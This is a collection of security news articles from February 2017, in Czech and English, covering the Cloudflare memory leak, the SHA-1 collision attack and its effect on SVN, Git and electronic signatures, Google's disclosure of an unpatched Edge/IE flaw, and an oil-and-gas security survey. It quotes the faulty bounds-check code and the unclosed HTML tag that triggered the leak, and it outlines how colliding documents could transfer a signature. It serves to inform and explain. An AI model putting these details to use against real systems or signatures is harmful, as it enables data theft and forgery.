Bezpečnostní tým Cloudflare okamžitě pochopil, že jde o vážnou situaci. První, co udělal, bylo vypnutí doplňkových služeb, které nejspíše problém způsobovaly. Konkrétně šlo o služby obfuskace e-mailových adres, server-side excludes a automatických přepisů odkazů z http na https. Podle zprávy o incidentu byly také okamžitě sestaveny týmy pro řešení incidentu – jeden v San Franciscu a druhý v Londýně tak, aby se mohly střídat po 12hodinových směnách v nepřetržitém provozu. K vypnutí e-mailové obfuskace, která způsobovala nejvíce úniků, došlo už 47 minut po nahlášení, ke kompletnímu vypnutí všech funkcí, které únik způsobovaly, došlo 7 hodin po nahlášení.
Hledání příčiny
Od začátku bylo zřejmé, že chyba je ve funkcích, které v proxy serverech za běhu upravují HTML kód stránek. K tomuto účelu v Cloudflare dlouho používali vlastní parser napsaný v jazyce Ragel. Před časem však došli k závěru, že tento kód je příliš složitý a těžko udržovatelný, a tak začali vyvíjet nový, cf-html. Oba parsery jsou provedeny jako moduly pro webový server NGINX a během přechodného období jsou aktivní oba.
Další vyšetřování ukázalo, že chyba byla ve starém kódu přítomna mnoho let, teprve kombinace s novým modulem ji však dokázala vyvolat. Přímou příčinou byla nedostatečná kontrola přetečení ukazatele za konec řetězce v kódu, generovaném kompilátorem jazyka Ragel:
/* generated code */
if ( ++p == pe )
goto _test_eof;
Je třeba zdůraznit, že nejde o chybu v kompilátoru jazyka Ragel, ale o chybu ve zdrojovém kódu v tomto jazyce, jehož autorem je Cloudflare.
Podmínka ve výše uvedeném kódu kontroluje pouze rovnost s koncovou zarážkou. Dojde-li z nějakého důvodu k přeskočení ukazatele za zarážku, není konec vstupu detekován a program čte z paměti bezprostředně následující za bufferem. V této paměti se mohou nacházet různá data z předchozích komunikací. Jelikož je infrastruktura Cloudflare sdílená mezi různými zákazníky, je možné získat data i jiných webových stránek, než těch, které jsou problémem postiženy. Princip čtení přes hranice alokované paměti je velmi podobný chybě Heartbleed z roku 2014.
Tavis Ormandy
Ukázka uniklých dat – data fitness náramku Fitbit
Spící zranitelnost
Chyba čtení za hranice byla v kódu přítomna nejspíše od samého počátku. K jejímu vyvolání došlo vyvoláním chyby parseru na samém konci posledního bufferu, například, když HTML kód na zdrojovém serveru končil takovouto neukončenou značkou:
<script type=
Chyba se však nemohla projevit, dokud tento modul pracoval v NGINX samostatně. Je to způsobeno stylem, jakým NGINX předává modulu data. Teprve v okamžiku, kdy byl k původnímu modulu přidán nový cf-html, byly splněny podmínky k tomu, aby chyba v původním kódu začala škodit.
K prvnímu nasazení cf-html došlo 22. září 2016, kdy byla do cf-html zmigrována funkce automatického přepisování http na https. Zákazníci, kteří měli tuto funkci zapnutou a zároveň splnili podmínku nevalidně ukončeného HTML, mohli způsobovat únik dat už od té doby. Tato funkce však není podle slov Cloudflare příliš používaná.
Dalším nasazením cf-html byla funkce Server-Side Excludes, k jejíž migraci došlo 30. ledna 2017. Tato funkce je však aktivována pouze pro IP adresy se špatnou reputací a slouží k filtrování potenciálně citlivých údajů. Pro běžný provoz se neprojeví. Největší vliv tak měla zatím poslední ze série migrací, která proběhla 13. února, tedy pouhých pár dní před zjištěním incidentu. Jednalo se o migraci funkce obfuskace e-mailových adres, která je naopak používána velmi často.
Identifikace poškození
Cloudflare provozuje pro různé úrovně zpracování webového obsahu samostatné instance webserveru NGINX. Proces, ve kterém byla chyba, je součástí zpracování HTML a je zcela oddělen od procesů terminace TLS, rekomprese obrázků a kešování. Je tedy jisté, že touto zranitelností nemohlo dojít ke kompromitaci privátních klíčů od zákaznických certifikátů. Mohlo však dojít k vyzrazení šifrovacích klíčů, kterými Cloudflare šifruje komunikaci mezi jednotlivými servery v rámci datacentra. Toto šifrování bylo zavedeno v reakci na informace Edwarda Snowdena o masivním monitorování.
Největším problémem ale je únik částí HTTP komunikace jiných zákazníků, kteří používali stejný proxy server. Taková komunikace může obsahovat uživatelská jména a hesla, nebo přinejmenším cookie sezení, které je možné zneužít ke kompromitaci cizích identit.
Zamořené keše
Zásadním problémem také je, že k vyvolání úniku dat nebyla zapotřebí (na rozdíl třeba od Heartbleedu) žádná sofistikovaná činnost, stačilo pouze stahovat webové stránky. To je činnost, která je bezpochyby nejčastější internetovou aktivitou vůbec a kromě koncových uživatelů ji provádějí automaticky nejrůznější roboti.
Uniklá data se tak objevila v keších všemožných vyhledávačů a webových archivů. Společnost Cloudflare vyjednala s několika vyhledávači odstranění podobných dat, můžeme se však jen dohadovat, zda se všechna data najít povedlo a zda někde stále neleží. Je celkem pravděpodobné, že nějaké úniky budou k nalezení i v lokálních keších webových prohlížečů v počítačích a mobilech celého světa.
Uniklá data na prodej
Teprve po nasazení nové verze HTML parserů s opravenou zranitelností, ke kterému došlo večer v úterý 21. února, a odstranění všech nalezených úniků z výsledků vyhledávání, byla informace o zranitelnosti zveřejněna. Kromě již zmíněné post mortem analýzy na blogu Cloudflare byl také zpřístupněn tiket, ve kterém Tavis Ormandy dokumentoval postup opravy problému, včetně ukázek úniků. Společnost Cloudflare také rozseslala všem zákazníkům hromadný e-mail, ve kterém upozorňuje na to, že postižených bylo pouze přibližně 150 zákazníků, nicméně doporučuje zneplatnit a vyměnit všechna dlouhodobá tajemství, jakými jsou třeba cookie sezení.
Počet 150 zákazníků se zdá velmi podhodnocený, neboť jde pouze o počet unikátních doménových jmen, ve kterých byly nalezené uniklé informace prostřednictvím vyhledávačů. Není přitom zřejmé, zda se bezpečnostním expertům podařilo identifikovat, komu patřila vlastní uniklá data. Každý, kdo provozuje webserver za Cloudflare proxy, by tedy měl minimálně zrušit všechna uložená sezení. Ideálně pak také vyzvat uživatele k preventivní změně hesla. Ostatně, netrvalo dlouho a temný web začal nabízet k prodeji soubory uniklých dat. Těžko říct, zda jde o skutečný únik nebo o jednoduchý podvod, přiživující se na aktuální zprávě.
Zneplatněná přihlášení Google s problémem nesouvisí
Shodou okolností minulý týden Google zneplatnil uložená přihlášení velké části uživatelů. Vypadá to jako souvislost, ale nedává to úplně smysl, protože Google služby určitě Cloudflare nepoužívají a je tedy nepravděpodobné, že by cookies, které slouží k autentizaci vůči Google, byly v jakémkoli nebezpečí. Tavis Ormandy na přímý dotaz odpovídá, že incidenty nemají nic společného, na fóru Google je pouze zpráva, že v průběhu rutinní údržby došlo k odhlášení některých uživatelů. Nejspíš tedy opravdu jde o pouhou shodu okolností.
Maximální otevřeností k minimalizaci škod
Na celé události je zajímavý především způsob, jakým společnost Cloudflare o problému informovala. Přestože se jedná o komerční firmu, a chyba se objevila v proprietárním softwaru, který je součástí firemního know-how, množství informací zásadně překračuje obvyklé strohé sdělení typu: „V našich systémech se vyskytla chyba, už jsme ji opravili, změňte si prosím heslo.“
Překvapující je také rychlost, s jakou byla společnost schopna úniky dat zastavit (i za cenu omezení služeb) i jak rychle byla nainstalována oprava. Škoda jen, že zpráva nejspíše podceňuje počet obětí. V haldě podrobných technických informací se také ztrácí krátká a jednoduchá informace pro zákazníky, co mají se svou službou za Cloudflare dělat, aby vliv případných úniků minimalizovali.
Apache Subversion System Affected by SHA-1 Collision
27.2.2017 securityweek Krypto
The successful SHA-1 collision attack announced last week by Google and CWI appears to have a serious impact on repositories that use the Apache Subversion (SVN) software versioning and revision control system.
Developers of the WebKit web browser engine noticed severe problems after attempting to add a test for the SHA-1 collision to their project. Uploading the example collision PDF files provided by Google caused their SVN repository to become corrupted and prevent further commits.
Google has posted an update to the SHAttered website to warn SVN users of the risks, and Apache Subversion developers have created a tool designed to prevent PDF files such as the ones provided by Google from being committed.
The search giant has so far only published two PDF documents that prove SHA-1 collisions are possible (i.e. the files have the same SHA-1 hash, but different content). However, after 90 days, the company will release the code that allows anyone to create such PDFs.
Finding SHA-1 collisions still requires significant resources – it would cost an attacker at least $110,000 worth of computing power via Amazon’s cloud services – but it’s still 100,000 times faster compared to a brute-force attack.
The SHAttered attack also impacts the Git distributed version control system, which relies on SHA-1 for identifying and checking the integrity of file objects and commits.
However, “the sky isn’t falling,” according to Linux kernel creator Linus Torvalds. Torvalds pointed out that there is a big difference between using SHA-1 for security and using it for generating identifiers for systems such as Git.
Nevertheless, steps have already been taken to mitigate these types of attacks, and Torvalds says Git will eventually transition to a more secure cryptographic hash function.
“There's a plan, it doesn't look all that nasty, and you don't even have to convert your repository,” Torvalds said in a post on Google+. “There's a lot of details to this, and it will take time, but because of the issues above, it's not like this is a critical ‘it has to happen now thing’.”
In addition to version control systems, collision attacks pose a serious threat to digital certificates, email signatures, software updates, vendor signatures, backup systems and ISO checksums. Major vendors have already started moving away from SHA-1, including Google, Facebook, Microsoft and Mozilla.
Google Discloses Unpatched Flaw in Edge, Internet Explorer
27.2.2017 securityweek Vulnerebility
Google Project Zero has disclosed a potentially serious vulnerability in Microsoft’s Edge and Internet Explorer web browsers before the tech giant could release patches.
The details of the flaw and proof-of-concept (PoC) code were made public last week by Google Project Zero researcher Ivan Fratric after Microsoft failed to meet the 90-day disclosure deadline.
The security hole, tracked as CVE-2017-0037, has been described as a high severity type confusion. The vulnerability can be exploited to cause the web browsers to crash, but arbitrary code execution could also be possible.
This is the second unpatched vulnerability in a Microsoft product disclosed by Google Project Zero this month. Earlier, Mateusz Jurczyk released the details of a medium severity information disclosure flaw tracked as CVE-2017-0038.
In addition, there is an unpatched denial-of-service (DoS) flaw in Windows caused by how SMB traffic is handled.
Microsoft only released patches for Adobe Flash Player this month after postponing its February 2017 updates to March 14 due to an unspecified “last minute issue.” It’s possible that the three vulnerabilities affecting Windows and the browsers were supposed to be fixed by the delayed security updates.
Microsoft claimed last month that the security mechanisms in Windows 10 can block the exploitation of zero-day vulnerabilities even before patches are made available. As an example the company provided two flaws exploited in sophisticated attacks against organizations in South Korea and the United States before fixes could be released.
SHA-1 není bezpečná, přesto se někde stále používá. Co to znamená v praxi?
27.2.2017 Lupa.cz Kryptografie
Úspěšný kolizní útok na hašovací funkci SHA-1 má zásadní dopady i do oblasti elektronických podpisů. Důrazně nám připomíná potřebu digitální kontinuity.
V závěru minulého týdne prošla odbornějšími médii zpráva o úspěšném kolizním útoku na hašovací funkci SHA-1. Mohli jste se o tom dočíst na mnoha místech (např. i zde na Rootu), proto jen velmi stručná a zjednodušená rekapitulace: spojenými silami Googlu a amsterodamského CWI se podařilo najít (vypočítat) způsob, jakým lze (již velmi rychle a snadno) vytvářet dvojice PDF dokumentů, které jsou vzájemně kolizní vzhledem k hašovací funkci SHA-1. Jinými slovy: dokumenty jsou různé, ale při použití hašovací funkce SHA-1 mají stejný otisk (hash, či: heš).
Jak co a jak přesně se podařilo, je čtením pro odborníky. Zde si snad vystačíme s velmi zjednodušenou představou: nejde o žádné „přímé prolomení hrubou silou“, ale o využití určité „zkratky“, navíc využívající konkrétních vlastností některých formátů elektronických dokumentů.
Konkrétně u formátu PDF se využívá toho, že kromě užitečného obsahu mohou mít konkrétní PDF dokumenty i poměrně velkou „vycpávku“, která se dá upravovat tak, aby při vkládání různého obsahu dokument stále vykazoval stejný otisk (při použití hašovací funkce SHA-1). To, co bylo nyní nalezeno, samozřejmě po dlouhých a náročných výpočtech, je základ takového PDF dokumentu, se kterým lze přesně toto dělat.
Praktické dopady si lze ukázat na prvních generátorech kolizních PDF dokumentů, které se velmi rychle objevily. Například tento (prý jen narychlo spíchnutý) vám umožní přijít se dvěma různými obrázky (musí být ve formátu JPG a do 64 kB), a z nich vám (prakticky ihned) vytvoří dva stejně velké soubory ve formátu PDF se stejným SHA-1 otiskem, ale s různým obsahem: každý z nich ukazuje jeden z obou vstupních obrázků.
Pro potřeby tohoto článku, a zejména pro názorné předvedení praktických důsledků, jsem si sám nechal vytvořit dva takovéto kolizní dokumenty: jeden s číslem 1, druhý s číslem 1000 (pro jejich vzájemné odlišení). Jde o soubory 1.pdf a 1000.pdf, které si můžete stáhnout v tomto ZIP balíčku i s jejich externím el. podpisem (viz dále).
To, že oba PDF dokumenty (s různým obsahem) mají stejný SHA-1 otisk, si můžete ověřit pomocí libovolného nástroje, který takový otisk dokáže spočítat. V on-line podobě je jich k dispozici řada, zde je použit tento:
Stejně tak si můžete sami vyzkoušet nový nástroj (file tester), který výzkumníci z Googlu a CWI sami zveřejnili, a který slouží k odhalování takovýchto vzájemně kolizních dokumentů (tj. různých, ale se stejným SHA-1 otiskem). A to dokonce tak, že jim stačí jen jeden z obou (vzájemně kolizních) dokumentů.
Je to možné díky tomu, že jejich nástroj vlastně testuje, zda jde o PDF dokument, se kterým si někdo (zde konkrétně: použitý generátor kolizních dokumentů) „hrál“ tím způsobem, na který oni právě přišli. Zjednodušeně: zda jde o onen specifický „základ“ PDF dokumentu, do kterého byl vložen nějaký konkrétní obsah a současně byla upravena jeho „vycpávka“ tak, aby soubor ve formátu PDF měl jako celek stále stejný otisk.
Co znamená stejný otisk?
Když mají dva různé dokumenty stejný otisk, je to samozřejmě problém. Velký problém. Projevuje se obecně všude tam, kde se nepracuje přímo s celými soubory, ale jen s jejich otisky – protože pak je nejde rozlišit.
Například v nejrůznějších systémech pro práci se soubory a jejich verzemi se mohou shodné soubory detekovat právě podle jejich otisku. Ale pokud se již nelze spoléhat na to, že dva různé soubory mají různé otisky, přestává být takováto detekce použitelná.
Dalším velkým příkladem jsou elektronické podpisy: elektronické podepisování ve skutečnosti funguje (a musí fungovat) tak, že se podepisuje nikoli samotný (a libovolně veliký) podepisovaný soubor, ale až jeho otisk pevné (a „malé“) velikosti. Důsledky jistě již tušíte: pokud mají dva různé soubory stejný otisk, budou mít i stejný elektronický podpis – a tak již nepůjde rozlišit, který z nich byl původně podepsán.
Opět si to ukažme na konkrétním příkladu: jeden z výše popisovaných dokumentů jsem opatřil svým kvalifikovaným elektronickým podpisem, a to s využitím hašovací funkce SHA-1. Fakticky jsem tak podepsal otisk, který je pro oba soubory stejný (společný).
Abyste si mohli sami a snadno ověřit, že oba soubory (1.pdf a 1000.pdf) mají (při použití SHA-1) stejný elektronický podpis – a že je tedy vlastně jedno a nejde poznat, který z nich jsem původně podepsal – zvolil jsem variantu externího elektronického podpisu. V ZIP balíčku, který si můžete stáhnout a vyzkoušet, je tento externí el. podpis obsažen v souboru podpis.pkcs7.
Pro praktické ověření toho, že jeden podpis „pasuje“ k oběma různým (ale dle SHA-1 vzájemně kolizním) PDF souborům samozřejmě potřebujete takový nástroj, který s externími podpisy umí pracovat. Moc jich dnes není, ale zkusit můžete třeba tento „unijní“ validátor. Jako „Signed file“ mu musíte zadat soubor s podpisem (tj. podpis.pkcs7), a jako podepsaný soubor pak postupně oba PDF soubory (1.pdf a 1000.pdf). V obou případech by měl být jeden a tentýž podpis vyhodnocen jako platný kvalifikovaný elektronický podpis kteréhokoli z obou PDF dokumentů (souborů). Takže opravdu nepoznáte, který z obou dokumentů jsem skutečně podepsal, a který nikoli.
Jak moc je to nebezpečné?
K dosud řečenému si ještě dodejme jeden důležitý aspekt: to, o co (zatím) jde, jsou kolize označované jako kolize prvního řádu. Tedy takové, v rámci kterých se hledají (nějaké) dva dokumenty, které mají různý obsah ale stejný otisk (zde: otisk, realizovaný pomocí SHA-1). Ještě složitější je hledání kolizí druhé řádu: kdy již máte nějaký konkrétní dokument, a k němu hledáte jiný dokument se stejným otiskem.
Praktické důsledky kolizí druhého řádu, konkrétně pro oblast elektronických podpisů, si zde lze představit ještě snáze než u kolizí prvního řádu: již máme elektronický dokument, který někdo jiný platně podepsal. Třeba nějaký dlužní úpis či smlouvu s konkrétním obsahem apod. Někdo se zlými úmysly ale k tomuto platně podepsanému dokumentu najde jiný dokument s jiným obsahem (například dlužní úpis na vyšší částku, smlouvu s jinými podmínkami apod.), a díky koliznímu charakteru obou dokumentů bude prezentovat nově nalezený dokument jako ten skutečně podepsaný. A pokud nebudou k dispozici nějaké jiné důkazy, ze samotných elektronických dokumentů nepůjde poznat, který z nich byl skutečně podepsán a na který byl podpis z jiného dokumentu pouze přenesen.
Nicméně i s kolizemi prvního řádu lze dělat různé podvody. Jen scénář musí být trochu jiný a složitější: ten, kdo by chtěl někoho podvést, si musí připravit dva vzájemně kolizní dokumenty s takovým obsahem, jaký k podvodu potřebuje. Pak musí přimět toho, koho chce podvést, aby podepsal jeden z nich. Pak může vzít jeho el. podpis, a „přenést“ jej na druhý (kolizní) dokument.
Co s tím?
Právě popsané nebezpečí je sice reálné, ale lze se mu poměrně snadno vyhnout – včasným přechodem na používání „lepších“ (dokonalejších, propracovanějších a složitějších) hašovacích funkcí. To se ostatně netýká jen dnes probírané hašovací funkce SHA-1, ale obecně všech hašovacích funkcí – které „z něčeho většího“ (celého souboru) dělají „něco menšího“ (otisk/hash).
Jejich základní vlastností je to, aby vytváření otisku („otiskování“, hašování) bylo jen jednosměrné, a aby ze samotného otisku nebylo možné zpětně sestavit původní dokument. To ostatně nejde už z principu: malý otisk (v případě SHA-1 jde o 20 bytů, resp. 160 bitů) nestačí na to, abyste podle něj vytvořili třeba několikamegabytový původní dokument.
Proto nám v praxi jde o něco jiného: aby nebylo reálné najít dva (či více) různých dokumentů, které mají – při použití téže hašovací funkce – stejný otisk. To zase v principu musí jít, a takových dokumentů dokonce musí existovat opravdu velké množství (když se nebudeme omezovat jejich velikostí, pak dokonce nekonečně mnoho). Proto nám v praxi stačí něco slabšího: aby nebylo v silách aktuálně dostupných počítačů najít alespoň dva takové dokumenty dříve, než za nějakou opravdu hodně dlouhou dobu (třeba nějaké desetitisíce let).
Jenže schopnosti počítačů velmi rychle rostou, a tak to, co by dnešním počítačům trvalo více jak ony desetitisíce let, by počítače zítřka mohly zvládnout třeba za hodinu. Nebo ještě rychleji, pokud se najde nějaká zkratka či jiný trik, jako právě nyní v případě hašovací funkce SHA-1.
Právě proto je nezbytně nutné postupně přecházet ze „starších“ hašovacích funkcí, ve smyslu méně náročných na složitost hledání kolizních dokumentů, na „novější“, které jsou spolehlivější, a hlavně podstatně náročnější na výpočetní složitost při hledání kolizních dokumentů. Stalo se tak již v případě ještě „starší“ hašovací funkce MD5, a stejně tak je tomu i u SHA-1. U ní je již delší dobu známo, že není dostatečně silná – a bylo jen otázkou času, kdy se objeví praktická možnost nalezení kolizních dokumentů v dostatečně krátkém čase. Nyní se tedy objevila.
Jak je to s přechodem u elektronických podpisů?
V případě elektronických podpisů došlo v ČR k přechodu od SHA-1 k novější rodině hashovacích funkcí SHA-2 (zahrnující varianty SHA-224, SHA-256, SHA384 a SHA-512) s přelomem let 2009 a 2010. Tehdy Ministerstvo vnitra „zavelelo“ k takovémuto přechodu těm subjektů, kterým to mohlo přikázat (kvalifikovaným certifikačním autoritám).
Kvalifikovaní poskytovatelé certifikačních služeb ukončí vydávání kvalifikovaných certifikátů s algoritmem SHA-1 do 31. 12. 2009.
Pravdou je, že naše kvalifikované (resp. akreditované) autority od uvedené doby skutečně vydávají jen takové certifikáty, které se opírají o hašovací funkce z rodiny SHA-2, nejčastěji o SHA-256 (s velikostí otisku/hashe 256 bitů).
Musíme si ale uvědomit, že vydávání certifikátů „s SHA-2“ znamená pouze to, že samotná certifikační autorita použije hašovací funkci SHA-2 pro podepsání (označení) certifikátu, který vystavuje. Přesněji: z té části certifikátu, která je podepisována, vytvoří otisk již pomocí hašovací funkce SHA-2, a tento otisk podepíše (opatří svou značkou). To je pak zaznamenáno i v obsahu samotného certifikátu, viz následující obrázek. Vidíte na něm dva mé starší certifikáty: vlevo certifikát z roku 2004, při jehož vystavování byla ještě využita SHA-1. Vpravo certifikát z roku 2010, vystavený již s využitím SHA-2 (konkrétně SHA256).
Podepisování není to samé jako vystavení certifikátu!
Pozor ale na jednu velmi důležitou věc: to, jestli byl váš certifikát vydán již s SHA-2, ještě nepředurčuje to, jaká hašovací funkce bude použita v případě, kdy budete podepisovat nějaký konkrétní dokument.
Plyne to i ze skutečnosti, že elektronický podpis můžete vytvořit (pomocí soukromého klíče) a jeho platnost ověřovat (pomocí veřejného klíče) i bez toho, abyste vůbec měli vystaven nějaký certifikát. Ten je ostatně jen jakýmsi osvědčením (od třetí důvěryhodné strany) o tom, komu patří soukromý klíč (kdo ho prohlašuje za svůj). Pokud svůj soukromý klíč osobně předáte někomu, kdo vás dobře zná, v zásadě váš certifikát ani nepotřebuje.
Jinými slovy: to, zda váš elektronický podpis využívá hašovací funkci SHA-1, některou z hašovacích funkcí SHA-2, či jakoukoli jinou, je nezávislé na tom, jaká hašovací funkce byla využita pro vystavení certifikátu. Ve skutečnosti záleží na tom, co a jak dělá (resp. jak je nastaven) ten program, který pro podepisování používáte.
Abych to názorně doložil, vytvořil jsem následující PDF dokument, který jsem opatřil pěti svými kvalifikovanými el. podpisy (založenými na stejném kvalifikovaném certifikátu s SHA-256). Každý z těchto podpisů ale byl vytvořen s použitím jiné hašovací funkce: po řadě MD5, SHA-1, SHA-256, SHA-384 a SHA-512.
Můžete si to sami ověřit. Třeba v Adobe Acrobat Readeru DC si můžete nechat zobrazit hašovací funkci, použitou při vytváření konkrétního el. podpisu, přes „Vlastnosti podpisu“ a „Další vlastnosti podpisu“, dle následujícího obrázku. 
Přitom právě Adobe Acrobat Reader je jedním z mála programů, které ještě umí vytvářet elektronické podpisy s využitím hašovací funkce SHA-1 (a dokonce i MD5). Právě tento program jsem ostatně použil pro vytvoření popisovaného příkladu souboru s 5 různými podpisy. Přitom jsem musel měnit nastavení programu podle návodu, který je popsán zde. Od verze 9.1 by Adobe Reader (dnes: Adobe Acrobat Reader DC) měl být defaultně nastaven tak, aby při podepisování používal hašovací funkci SHA-256, takže běžní uživatelé nemusí toto jeho nastavení měnit.
V případě podepisování dokumentů pomocí programů MS Office by (alespoň podle tohoto zdroje) mělo platit, že do verze 2010 jsou podpisy vytvářeny ještě s SHA-1, a v novějších verzích již s SHA-2. Případnou změnu nastavení lze provést způsobem popsaným zde.
Zajímavé je to ale i dalších případech, jako třeba u podepisování zpráv elektronické pošty. I zde samozřejmě záleží na tom, jak je nastaven příslušný program. Například u MS Outlooku se hašovací funkce volí při volbě certifikátu pro podepisování, viz obrázek.
U konkrétní zprávy si pak můžete nechat zobrazit použitou hašovací funkci postupem dle následujícího obrázku.
Kdo stále ještě používá SHA-1?
U elektronických podpisů je tedy nutné dávat pozor na to, že způsob vydávání certifikátů a samotné podepisování jsou dvě různé věci: i když máte certifikát s SHA-2, stále záleží na tom, co a jak dělá ten program, který k podepisování používáte. A snad z výše popisovaného je dostatečně zřejmé, proč je navýsost vhodné již nepoužívat hašovací funkci SHA-1.
Pravdou je, že snad všechny (současné) programy pro podepisování, které znám a které jsou určeny pro „koncové uživatele“, již podporují funkce SHA-2 a jsou také nastaveny tak, aby je používaly (s výjimkou podepisování v MS Office ve verzích do 2010 včetně, viz výše). A to proto, že jejich autoři si včas uvědomili potřebu přechodu od SHA-1 k SHA-2, a provedli jej.
Reálný problém ale může být tam, kde jde o různá „zadrátovaná“ řešení, která jejich autoři ještě neupravili (resp. jejich provozovatelé si to nevyžádali). Nedělal jsem v tomto ohledu žádný systematický průzkum, ale jen jsem se letmo podíval na několik služeb našeho eGovernmentu – a zjistil, že s využitím SHA-1 jsou stále podepisovány například (strojově generované) výpisy z obchodních rejstříků, či výpisy ze základních registrů. Ukazují to následující obrázky.
Pro první z nich jsem schválně přepnul Adobe Acrobat Reader DC do angličtiny, aby bylo dobře vidět, že česká lokalizace má drobnou chybu: zatímco anglická verze vypisuje „Hash Algorithm: SHA1“, česká verze nemá v příslušné hlášce dvojtečku ani následnou mezeru, a tak vypisuje nesprávně „Algoritmus hashSHA1“.
Není ale pravdou, že všechna řešení v rámci našeho eGovernmentu stále ještě podepisují (označují, případně: pečetí) s využitím SHA-1. Snad je to právě naopak, a většina již dávno přešla na SHA-2. Třeba datové schránky označují své zprávy s využitím SHA256 již od roku 2011. Ze strojově generovaných výpisů z veřejných rejstříků pak s SHA-2 nemá problém například živnostenský rejstřík.
Mimochodem: právě výpisy z živnostenského rejstříku už jsou také v tzv. referenčním formátu elektronického podpisu, který by orgány veřejné moci měly používat již od roku 2011 (původně kvůli tomuto Rozhodnutí Komise č. 2011/130/EU, nově kvůli eIDASu). Což výše uváděné výpisy ze základních registrů či z Obchodního rejstříku stále nedělají.
A to ještě nemluvím o tom, že dnes již účinný zákon č. 297/2016 Sb. o službách vytvářejících důvěru ve svém §11 požaduje, aby i takovéto výpisy z veřejných rejstříků byly opatřeny časovým razítkem. Což dodnes nejsou. Přitom právě časové razítko, přidávané k dokumentu a vytvářené z otisku získaného již pomocí SHA-2, by mohlo eliminovat nebezpečí, plynoucí z použití zastaralé a slabé funkce SHA-1.
Neignorujme digitální kontinuitu!
Na závěr tohoto článku bych rád využil příležitosti a znovu zdůraznil dlouhodobě ignorovaný problém digitální kontinuity. Tedy problém toho, co nám právě bylo velmi názorně předvedeno a prokázáno – že kryptografické algoritmy a funkce s postupem času zastarávají, s tím jak roste výpočetní kapacita dostupných počítačů (a jak se občas daří nalézat různé triky a „zkratky“ na uspíšení). Čímž se otevírá a stává reálně schůdnou cesta pro ty, kteří by chtěli námi původně podepsané dokumenty nahradit nějakými svými (kolizními) dokumenty. Třeba jen proto, aby z původní 1 udělali nově 1000 (viz reálný příklad v tomto balíčku).
test
Takže pokud chceme uchovávat své elektronické dokumenty v takovém stavu, abychom se na ně mohli – ještě po nějaké delší době – stále spoléhat, musíme tomuto trendu jít naproti. Musíme se starat o včasné posílení toho, jak jsou naše dokumentu zabezpečeny právě proti možné záměně kolizními dokumenty. Nesmíme čekat na to, až se to stane reálně možné, protože pak už by bylo pozdě. Musíme to dělat včas, a to pravidelně, skrze nasazení nových, „lepších“ a hlavně silnějších hašovacích funkcí a delších klíčů. Nejsnáze cestou přidávání dalších časových razítek (pravidelného přerazítkovávání).
Na tuto nezbytnost se stále zapomíná. Nejspíše proto, že je pracná, relativně složitá, a také něco stojí. Samozřejmě je jednodušší nic nedělat a nechávat elektronické dokumenty jen tak někde válet v šuplíku, s představou, že za x let je budeme moci využít (a hlavně: spoléhat se na jejich pravost a autenticitu) úplně stejně jako dnes. Budiž nám dnešní příběh kolem hašovací funkce mementem a důrazným upozorněním, že tomu tak není a nebude.
CVE-2017-0037 – Google Project Zero discloses another unpatched Microsoft Edge and IE Vulnerability
27.2.2017 securityaffairs Vulnerebility
The researchers at Google’s Project Zero have revealed another flaw, tracked as CVE-2017-0037, that affects Microsoft Edge and IE.
It has happened again, the researchers at Google’s Project Zero have revealed another flaw, tracked as CVE-2017-0037, in Microsoft products.
The flaw affects Microsoft’s Internet Explorer and Edge browsers, it was first reported on November 25 by the Google researcher Ivan Fratric, and Google publicly released the details of the vulnerability as Microsoft did not fix it within its 90-day disclosure deadline.
The CVE-2017-0037 vulnerability, so-called “type confusion flaw,” resides in a module in Microsoft Edge and Internet Explorer that let attackers execute arbitrary code on the target machine when the victim visits a malicious website.
The flaw affects all Windows 7, Windows 8.1, and Windows 10 users.
The researcher has also published a proof-of-concept exploit that can crash Edge and IE, allowing an attacker to execute code and gain administrator privileges on the affected systems.
In the note included in the exploit code, Fratric confirmed that the attack works on the 64-bit version of IE on Windows Server 2012 R2. The flaw affects both 32-bit IE 11, as well as Microsoft Edge.
Giving a look at the technical details of the CVE-2017-0037 vulnerability it is possible to note that it works by attacking a type confusion in
HandleColumnBreak
OnColumnSpanningElement.
The 17-line proof-of-concept code crashes this process working with the two variables rcx and rax.
“However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the firs th element. Let’s see what happens if an attacker can point rax to the memory he/she controls.” reads the analysis shared by Project Zero Team.
“Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG”
Earlier this month, Microsoft delayed February’s Patch Tuesday, the experts at Project Zero publicly disclosed the flaw in Windows’ Graphics Device Interface (GDI) library because Microsoft failed to patch it within the 90-day window given by the Google.
On Tuesday Microsoft issued the security updates KB 4010250 that address flaws in Adobe Flash Player, but two already disclosed flaws remain unpatched.
The first flaw is a Windows SMB (Server Message Block) vulnerability that affects Windows 8, Windows 10 and Windows Server. It is a memory corruption vulnerability in the SMBprotocol that can be exploited by a remote attacker, the proof-of-concept exploit code of the flaw was recently publicly released.
The second flaw doesn’t address by the last security updates is the one recently disclosed by the Google Project Zero team that affects Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10.
US Oil and Gas Industry unprepared to mitigate risks in operational technology (OT) environments
27.2.2017 securityaffairs Cyber
A study commissioned by Siemens revealed that US oil and gas industry is unprepared to mitigate cybersecurity risks in operational technology environments.
A new study commissioned by the engineering firm Siemens revealed that oil and gas industry in the United States is largely unprepared to mitigate cybersecurity risks in operational technology (OT) environments.
The survey was conducted by the Ponemon Institute and involved 377 individuals who are responsible for securing or overseeing cyber risk in the OT environment. Sixty-eight percent of respondents admitted having suffered at least one cyber incident in the past year that caused OT disruption or loss of confidential information.
Only 41 percent of respondents admitted to continually monitor all infrastructure to prioritize threats and attacks. The worrying data emerged from the survey is that an average of 46 percent of all cyber attacks in the OT environment goes undetected, this means that organizations have to improve their security posture by adopting systems for threat detection.
20% one in five of respondents admitted that their organizations were compromised by a sophisticated strain of malware such as Duqu and Flame.
Exploratory information and production information are the most vulnerable areas in the oil and gas value chain.
“Exploratory information is the area most vulnerable in the oil and gas value chain to a cyber attack. When asked to identify the top seven areas of greatest risk, 72 percent of respondents say it is exploratory information and 60 percent of respondents say it is production information” reads the study.
The majority of respondents rate their organization’s OT cyber readiness as low to medium cybersecurity readiness, only 35 percent believe they are resilient to cyber attacks
67 percent believe cyber threats have had a significant impact on the risk to industrial control systems (ICS).
Sixty-nine percent of individuals who participated in the survey are concerned about the risks associated with third-parties in the supply chain.
